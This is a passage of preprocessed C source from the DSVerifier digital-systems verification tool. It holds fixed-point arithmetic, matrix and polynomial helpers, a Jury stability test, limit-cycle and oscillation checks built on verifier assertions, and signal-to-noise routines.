void fxp_float_to_fxp_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_float_to_fxp(f[i]);
}
}
void fxp_double_to_fxp_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
r[i] = fxp_double_to_fxp(f[i]);
}
}
# 275 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
float fxp_to_float(fxp_t fxp) {
float f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
double fxp_to_double(fxp_t fxp) {
double f;
int f_int = (int) fxp;
f = f_int * scale_factor_inv[impl.frac_bits];
return f;
}
void fxp_to_float_array(float f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_float(r[i]);
}
}
void fxp_to_double_array(double f[], fxp_t r[], int N) {
int i;
for(i = 0; i < N; ++i) {
f[i] = fxp_to_double(r[i]);
}
}
fxp_t fxp_abs(fxp_t a) {
fxp_t tmp;
tmp = ((a < 0) ? -(fxp_t)(a) : a);
tmp = fxp_quantize(tmp);
return tmp;
}
fxp_t fxp_add(fxp_t aadd, fxp_t badd) {
fxp_t tmpadd;
tmpadd = ((fxp_t)(aadd) + (fxp_t)(badd));
tmpadd = fxp_quantize(tmpadd);
return tmpadd;
}
fxp_t fxp_sub(fxp_t asub, fxp_t bsub) {
fxp_t tmpsub;
tmpsub = (fxp_t)((fxp_t)(asub) - (fxp_t)(bsub));
tmpsub = fxp_quantize(tmpsub);
return tmpsub;
}
fxp_t fxp_mult(fxp_t amult, fxp_t bmult) {
fxp_t tmpmult, tmpmultprec;
tmpmult = (fxp_t)((fxp_t)(amult)*(fxp_t)(bmult));
if (tmpmult >= 0) {
tmpmultprec = (tmpmult + ((tmpmult & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits;
} else {
tmpmultprec = -(((-tmpmult) + (((-tmpmult) & 1 << (impl.frac_bits - 1)) << 1)) >> impl.frac_bits);
}
tmpmultprec = fxp_quantize(tmpmultprec);
return tmpmultprec;
}
# 372 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_div(fxp_t a, fxp_t b){
__DSVERIFIER_assume( b!=0 );
fxp_t tmpdiv = ((a << impl.frac_bits) / b);
tmpdiv = fxp_quantize(tmpdiv);
return tmpdiv;
}
fxp_t fxp_neg(fxp_t aneg) {
fxp_t tmpneg;
tmpneg = -(fxp_t)(aneg);
tmpneg = fxp_quantize(tmpneg);
return tmpneg;
}
# 398 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/fixed-point.h"
fxp_t fxp_sign(fxp_t a) {
return ((a == 0) ? 0 : ((a < 0) ? _fxp_minus_one : _fxp_one) );
}
fxp_t fxp_shrl(fxp_t in, int shift) {
return (fxp_t) (((unsigned int) in) >> shift);
}
fxp_t fxp_square(fxp_t a) {
return fxp_mult(a, a);
}
void fxp_print_int(fxp_t a) {
printf("\n%i", (int32_t)a);
}
void fxp_print_float(fxp_t a) {
printf("\n%f", fxp_to_float(a));
}
void fxp_print_float_array(fxp_t a[], int N) {
int i;
for(i = 0; i < N; ++i) {
printf("\n%f", fxp_to_float(a[i]));
}
}
void print_fxp_array_elements(char * name, fxp_t * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %jd ", v[i]);
}
printf("}\n");
}
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 1
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
void initialize_array(double v[], int n){
int i;
for(i=0; i<n; i++){
v[i] = 0;
}
}
void revert_array(double v[], double out[], int n){
initialize_array(out,n);
int i;
for(i=0; i<n; i++){
out[i] = v[n-i-1];
}
}
double internal_pow(double a, double b){
int i;
double acc = 1;
for (i=0; i < b; i++){
acc = acc*a;
}
return acc;
}
double internal_abs(double a){
return a < 0 ? -a : a;
}
int fatorial(int n){
return n == 0 ? 1 : n * fatorial(n-1);
}
int check_stability(double a[], int n){
int lines = 2 * n - 1;
int columns = n;
double m[lines][n];
int i,j;
double current_stability[n];
for (i=0; i < n; i++){
current_stability[i] = a[i];
}
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
if (sum <= 0){
printf("[DEBUG] the first constraint of Jury criteria failed: (F(1) > 0)");
return 0;
}
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
if (sum <= 0){
printf("[DEBUG] the second constraint of Jury criteria failed: (F(-1)*(-1)^n > 0)");
return 0;
}
if (internal_abs(a[n-1]) > a[0]){
printf("[DEBUG] the third constraint of Jury criteria failed: (abs(a0) < a_{n}*z^{n})");
return 0;
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
}
}
for (i=0; i < lines; i++){
for (j=0; j < columns; j++){
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
}
}
}
int first_is_positive = m[0][0] >= 0 ? 1 : 0;
for (i=0; i < lines; i++){
if (i % 2 == 0){
int line_is_positive = m[i][0] >= 0 ? 1 : 0;
if (first_is_positive != line_is_positive){
return 0;
}
continue;
}
}
return 1;
}
void poly_sum(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
Nans = Na>Nb? Na:Nb;
for (i=0; i<Nans; i++){
if (Na>Nb){
ans[i]=a[i];
if (i > Na-Nb-1){
ans[i]=ans[i]+b[i-Na+Nb];
}
}else {
ans[i]=b[i];
if (i> Nb - Na -1){
ans[i]=ans[i]+a[i-Nb+Na];
}
}
}
}
void poly_mult(double a[], int Na, double b[], int Nb, double ans[], int Nans){
int i;
int j;
int k;
Nans = Na+Nb-1;
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=0;
}
}
for (i=0; i<Na; i++){
for (j=0; j<Nb; j++){
k= Na + Nb - i - j - 2;
ans[k]=ans[k]+a[Na - i - 1]*b[Nb - j - 1];
}
}
}
void double_check_oscillations(double * y, int y_size){
__DSVERIFIER_assume(y[0] != y[y_size - 1]);
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
((void) sizeof ((
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
!(window_count == window_size)
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
) ; else __assert_fail (
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
"!(window_count == window_size)"
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h", 209, __extension__ __PRETTY_FUNCTION__); }))
# 209 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/util.h"
;
}
}else{
break;
}
window_timer++;
}
}
}
void double_check_limit_cycle(double * y, int y_size){
double reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assert(desired_elements != found_elements);
}
void double_check_persistent_limit_cycle(double * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
double reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
double lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void print_array_elements(char * name, double * v, int n){
printf("%s = {", name);
int i;
for(i=0; i < n; i++){
printf(" %.32f ", v[i]);
}
printf("}\n");
}
void double_add_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] + m2[i][j];
}
}
}
void double_sub_matrix( unsigned int lines, unsigned int columns, double m1[4][4], double m2[4][4], double result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
result[i][j] = m1[i][j] - m2[i][j];
}
}
}
void double_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, double m1[4][4], double m2[4][4], double m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
double mult = (m1[i][k] * m2[k][j]);
m3[i][j] = m3[i][j] + (m1[i][k] * m2[k][j]);
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_matrix_multiplication( unsigned int i1, unsigned int j1, unsigned int i2, unsigned int j2, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t m3[4][4]){
unsigned int i, j, k;
if (j1 == i2) {
for (i=0; i<i1; i++) {
for (j=0; j<j2; j++) {
m3[i][j] = 0;
}
}
for (i=0;i<i1; i++) {
for (j=0; j<j2; j++) {
for (k=0; k<j1; k++) {
m3[i][j] = fxp_add( m3[i][j], fxp_mult(m1[i][k] , m2[k][j]));
}
}
}
} else {
printf("\nError! Operation invalid, please enter with valid matrices.\n");
}
}
void fxp_exp_matrix(unsigned int lines, unsigned int columns, fxp_t m1[4][4], unsigned int expNumber, fxp_t result[4][4]){
unsigned int i, j, l, k;
fxp_t m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = fxp_double_to_fxp(1.0);
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = fxp_add( result[i][j], fxp_mult(m2[i][k] , m1[k][j]));
}
}
}
}
}
void double_exp_matrix(unsigned int lines, unsigned int columns, double m1[4][4], unsigned int expNumber, double result[4][4]){
unsigned int i, j, k, l;
double m2[4][4];
if(expNumber == 0){
for (i = 0; i < lines; i++){
for (j = 0; j < columns; j++){
if(i == j){
result[i][j] = 1.0;
} else {
result[i][j] = 0.0;
}
}
}
return;
}
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = m1[i][j];
if(expNumber == 1){
return;
}
for(l = 1; l < expNumber; l++){
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) m2[i][j] = result[i][j];
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = 0;
for (i=0;i<lines; i++) {
for (j=0; j<columns; j++) {
for (k=0; k<columns; k++) {
result[i][j] = result[i][j] + (m2[i][k] * m1[k][j]);
}
}
}
}
}
void fxp_add_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) {
result[i][j] = fxp_add(m1[i][j] , m2[i][j]);
}
}
void fxp_sub_matrix( unsigned int lines, unsigned int columns, fxp_t m1[4][4], fxp_t m2[4][4], fxp_t result[4][4]){
unsigned int i, j;
for (i = 0; i < lines; i++)
for (j = 0; j < columns; j++) result[i][j] = fxp_sub(m1[i][j] , m2[i][j]);
}
void print_matrix(double matrix[4][4], unsigned int lines, unsigned int columns){
printf("\nMatrix\n=====================\n\n");
unsigned int i, j;
for (i=0; i<lines; i++) {
for (j=0; j<columns; j++) {
printf("#matrix[%d][%d]: %2.2f ", i,j,matrix[i][j]);
}
printf("\n");
}
printf("\n");
}
double determinant(double a[4][4],int n)
{
int i,j,j1,j2;
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
double fxp_determinant(fxp_t a_fxp[4][4],int n)
{
int i,j,j1,j2;
double a[4][4];
for(i=0; i<n;i++){
for(j=0; j<n;j++){
a[i][j]= fxp_to_double(a_fxp[i][j]);
}
}
double det = 0;
double m[4][4];
if (n < 1) {
} else if (n == 1) {
det = a[0][0];
} else if (n == 2) {
det = a[0][0] * a[1][1] - a[1][0] * a[0][1];
} else {
det = 0;
for (j1=0;j1<n;j1++) {
for (i=0;i<n-1;i++)
for (i=1;i<n;i++) {
j2 = 0;
for (j=0;j<n;j++) {
if (j == j1)
continue;
m[i-1][j2] = a[i][j];
j2++;
}
}
det += internal_pow(-1.0,1.0+j1+1.0) * a[0][j1] * determinant(m,n-1);
}
}
return(det);
}
void transpose(double a[4][4], double b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
void fxp_transpose(fxp_t a[4][4], fxp_t b[4][4],int n, int m)
{
int i,j;
for (i=0;i<n;i++) {
for (j=0;j<m;j++) {
b[j][i] = a[i][j];
}
}
}
# 24 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
extern int generic_timer;
extern hardware hw;
double generic_timing_shift_l_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[0];
generic_timer += ((5 * hw.assembly.ldd) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.ld));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < N - 1; i++) {
generic_timer += ((17 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (6 * hw.assembly.mov) + (2 * hw.assembly.adiw) + (5 * hw.assembly.std) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbc)+ (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
z[i] = z[i + 1];
}
z[N - 1] = zIn;
generic_timer += ((12 * hw.assembly.ldd) + (6 * hw.assembly.mov) + (3 * hw.assembly.std) + (2 * hw.assembly.lsl) + (2 * hw.assembly.rol) + (1 * hw.assembly.adc) + (1 * hw.assembly.add) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in)+ (1 * hw.assembly.cli));
generic_timer += ((3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret));
return (zOut);
}
double generic_timing_shift_r_double(double zIn, double z[], int N) {
generic_timer += ((2 * hw.assembly.push) + (3 * hw.assembly.in) + (3 * hw.assembly.out) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (8 * hw.assembly.std));
int i;
double zOut;
zOut = z[N - 1];
generic_timer += ((7 * hw.assembly.ldd) + (2 * hw.assembly.rol) + (2 * hw.assembly.lsl) + (2 * hw.assembly.mov) + (4 * hw.assembly.std) + (1 * hw.assembly.add) + (1 * hw.assembly.adc) + (1 * hw.assembly.ld) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci));
generic_timer += ((2 * hw.assembly.ldd) + (2 * hw.assembly.std) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.rjmp));
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
generic_timer += ((15 * hw.assembly.ldd) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (4 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.ld) + (1 * hw.assembly.st) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
}
z[0] = zIn;
generic_timer += ((10 * hw.assembly.ldd) + (5 * hw.assembly.mov) + (3 * hw.assembly.std) + (3 * hw.assembly.out) + (2 * hw.assembly.pop) + (1 * hw.assembly.ret) + (1 * hw.assembly.ret) + (1 * hw.assembly.cli) + (1 * hw.assembly.in) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw));
return zOut;
}
fxp_t shiftL(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
fxp_t shiftR(fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
float shiftLfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
float shiftRfloat(float zIn, float z[], int N) {
int i;
float zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftRDdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
double shiftRdouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
}
z[0] = zIn;
return zOut;
}
double shiftLDouble(double zIn, double z[], int N) {
int i;
double zOut;
zOut = z[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
}
z[N - 1] = zIn;
return (zOut);
}
void shiftLboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[0];
zfOut = zf[0];
for (i = 0; i < N - 1; i++) {
z[i] = z[i + 1];
zf[i] = zf[i + 1];
}
z[N - 1] = zIn;
zf[N - 1] = zfIn;
}
void shiftRboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) {
int i;
fxp_t zOut;
float zfOut;
zOut = z[N - 1];
zfOut = zf[N - 1];
for (i = N - 1; i > 0; i--) {
z[i] = z[i - 1];
zf[i] = zf[i - 1];
}
z[0] = zIn;
zf[0] = zfIn;
}
int order(int Na, int Nb) {
return Na > Nb ? Na - 1 : Nb - 1;
}
void fxp_check_limit_cycle(fxp_t y[], int y_size){
fxp_t reference = y[y_size - 1];
int idx = 0;
int window_size = 1;
for(idx = (y_size-2); idx >= 0; idx--){
if (y[idx] != reference){
window_size++;
}else{
break;
}
}
__DSVERIFIER_assume(window_size != y_size && window_size != 1);
printf("window_size %d\n", window_size);
int desired_elements = 2 * window_size;
int found_elements = 0;
for(idx = (y_size-1); idx >= 0; idx--){
if (idx > (y_size-window_size-1)){
printf("%.0f == %.0f\n", y[idx], y[idx-window_size]);
int cmp_idx = idx - window_size;
if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){
found_elements = found_elements + 2;
}else{
break;
}
}
}
__DSVERIFIER_assume(found_elements > 0);
printf("desired_elements %d\n", desired_elements);
printf("found_elements %d\n", found_elements);
__DSVERIFIER_assume(found_elements == desired_elements);
__DSVERIFIER_assert(0);
}
void fxp_check_persistent_limit_cycle(fxp_t * y, int y_size){
int idy = 0;
int count_same = 0;
int window_size = 0;
fxp_t reference = y[0];
for(idy = 0; idy < y_size; idy++){
if (y[idy] != reference){
window_size++;
} else if (window_size != 0){
break;
} else {
count_same++;
}
}
window_size += count_same;
__DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2);
fxp_t lco_elements[window_size];
for(idy = 0; idy < y_size; idy++){
if (idy < window_size){
lco_elements[idy] = y[idy];
}
}
idy = 0;
int lco_idy = 0;
_Bool is_persistent = 0;
while (idy < y_size){
if(y[idy++] == lco_elements[lco_idy++]){
is_persistent = 1;
}else{
is_persistent = 0;
break;
}
if (lco_idy == window_size){
lco_idy = 0;
}
}
__DSVERIFIER_assert(is_persistent == 0);
}
void fxp_check_oscillations(fxp_t y[] , int y_size){
__DSVERIFIER_assume((y[0] != y[y_size - 1]) && (y[y_size - 1] != y[y_size - 2]));
int window_timer = 0;
int window_count = 0;
int i, j;
for (i = 2; i < y_size; i++){
int window_size = i;
for(j=0; j<y_size; j++){
if (window_timer > window_size){
window_timer = 0;
window_count = 0;
}
int window_index = j + window_size;
if (window_index < y_size){
if (y[j] == y[window_index]){
window_count++;
__DSVERIFIER_assert(!(window_count == window_size));
}
}else{
break;
}
window_timer++;
}
}
}
int fxp_ln(int x) {
int t, y;
y = 0xa65af;
if (x < 0x00008000)
x <<= 16, y -= 0xb1721;
if (x < 0x00800000)
x <<= 8, y -= 0x58b91;
if (x < 0x08000000)
x <<= 4, y -= 0x2c5c8;
if (x < 0x20000000)
x <<= 2, y -= 0x162e4;
if (x < 0x40000000)
x <<= 1, y -= 0x0b172;
t = x + (x >> 1);
if ((t & 0x80000000) == 0)
x = t, y -= 0x067cd;
t = x + (x >> 2);
if ((t & 0x80000000) == 0)
x = t, y -= 0x03920;
t = x + (x >> 3);
if ((t & 0x80000000) == 0)
x = t, y -= 0x01e27;
t = x + (x >> 4);
if ((t & 0x80000000) == 0)
x = t, y -= 0x00f85;
t = x + (x >> 5);
if ((t & 0x80000000) == 0)
x = t, y -= 0x007e1;
t = x + (x >> 6);
if ((t & 0x80000000) == 0)
x = t, y -= 0x003f8;
t = x + (x >> 7);
if ((t & 0x80000000) == 0)
x = t, y -= 0x001fe;
x = 0x80000000 - x;
y -= x >> 15;
return y;
}
double fxp_log10_low(double x) {
int xint = (int) (x * 65536.0 + 0.5);
int lnum = fxp_ln(xint);
int lden = fxp_ln(655360);
return ((double) lnum / (double) lden);
}
double fxp_log10(double x) {
if (x > 32767.0) {
if (x > 1073676289.0) {
x = x / 1073676289.0;
return fxp_log10_low(x) + 9.030873362;
}
x = x / 32767.0;
return fxp_log10_low(x) + 4.515436681;
}
return fxp_log10_low(x);
}
float snrVariance(float s[], float n[], int blksz) {
int i;
double sm = 0, nm = 0, sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sm += s[i];
nm += n[i];
}
sm /= blksz;
nm /= blksz;
for (i = 0; i < blksz; i++) {
sv += (s[i] - sm) * (s[i] - sm);
nv += (n[i] - nm) * (n[i] - nm);
}
if (nv != 0.0f) {
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 373, __extension__ __PRETTY_FUNCTION__); }))
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPower(float s[], float n[], int blksz) {
int i;
double sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sv += s[i] * s[i];
nv += n[i] * n[i];
}
if (nv != 0.0f) {
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 394, __extension__ __PRETTY_FUNCTION__); }))
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPoint(float s[], float n[], int blksz) {
int i;
double ratio = 0, power = 0;
for (i = 0; i < blksz; i++) {
if(n[i] == 0) continue;
ratio = s[i] / n[i];
if(ratio > 150.0f || ratio < -150.0f) continue;
power = ratio * ratio;
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
